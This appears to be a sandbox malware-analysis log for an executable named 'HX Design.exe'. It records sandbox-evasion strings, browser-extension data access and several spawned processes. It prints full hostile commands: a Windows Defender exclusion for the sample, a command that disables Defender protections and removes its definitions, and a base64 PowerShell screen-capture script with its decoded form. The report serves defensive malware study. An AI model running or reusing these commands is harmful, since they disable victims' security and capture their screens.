Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HX Design.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\HX Design.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17307

Source: C:\Users\user\Desktop\HX Design.exe

API coverage: 5.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep count: 7922 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep count: 1458 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 7637 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep count: 1838 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep count: 4249 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep count: 2572 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8012	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852	Thread sleep count: 2751 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568	Thread sleep count: 1091 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596	Thread sleep count: 3442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908	Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7320683C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732069280 FindFirstFileExW,FindClose,	0_2_00007FF732069280
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF732081874
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732069280 FindFirstFileExW,FindClose,	1_2_00007FF732069280
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF7320683C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF732081874
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	73_2_00007FF77D2146EC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2588E0 FindFirstFileExA,	73_2_00007FF77D2588E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D20E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	73_2_00007FF77D20E21C

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 1_2_00007FFDFB2F1230 GetSystemInfo,

1_2_00007FFDFB2F1230

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Source: HX Design.exe, 00000000.00000003.1674037993.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.2920347865.00000298F222B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000003C.00000002.2922517117.00000298F785A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: fecodevmusrvc
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: `8Of1vmware
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d8qemu-ga
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f4vmsrvc
Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: msedge.exe, 0000003B.00000002.1917958412.00000143C522B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000003A.00000002.1917350022.000001C518098000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF73206D12C

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 1_2_00007FFDFAD90350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFAD90350

Source: C:\Users\user\Desktop\HX Design.exe

Code function: 0_2_00007FF732083480 GetProcessHeap,

0_2_00007FF732083480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73206D12C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206D30C SetUnhandledExceptionFilter,	0_2_00007FF73206D30C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF73206C8A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73207A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF73207A614
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF73206D12C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206D30C SetUnhandledExceptionFilter,	1_2_00007FF73206D30C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF73206C8A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73207A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF73207A614
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFACE3248 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDFACE3248
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0031212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFE0031212B
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311CB7 SetUnhandledExceptionFilter,	1_2_00007FFE00311CB7
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D254C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	73_2_00007FF77D254C10
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	73_2_00007FF77D24A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24B6D8 SetUnhandledExceptionFilter,	73_2_00007FF77D24B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	73_2_00007FF77D24B52C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HX Design.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\HX Design.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
